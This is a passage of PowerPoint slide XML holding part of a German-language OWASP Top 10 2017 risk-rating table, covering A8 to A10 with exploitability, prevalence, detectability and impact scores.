                </a:extLst>
              </a:tr>
              <a:tr h="393205">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A8:2017-Unsichere Deserialisierung</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwierig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>
                      </a:endParaRP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ct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Häufig: 2</a:t>
                      </a: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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5,0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8"/>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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Komp. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>bek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwachstellen</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mittel: 2</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4,7</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9"/>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A10:2017-Unzureich.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="1" kern="120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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwierig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>
                      </a:endParaRP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ct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mittel: 2</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="1" kern="120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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4,0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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819401" y="2846743"/>
            <a:ext cx="995283" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verbreitung</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897233" y="2846743"/>
            <a:ext cx="903369" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="10800" rIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auffindbarkeit</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2846743"/>
            <a:ext cx="956796" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="36000" rIns="36000">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ausnutzbarkeit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2846743"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Technisch</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219201" y="2450702"/>
            <a:ext cx="4887049" cy="615781"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="659750"/>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en-US" sz="900" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Schwach</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>stelle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="760990" y="1062873"/>
              <a:ext cx="139702" cy="304798"/>
              <a:chOff x="683" y="1478"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="1478"/>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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="827" y="1670"/>
                <a:ext cx="0" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="683" y="1910"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
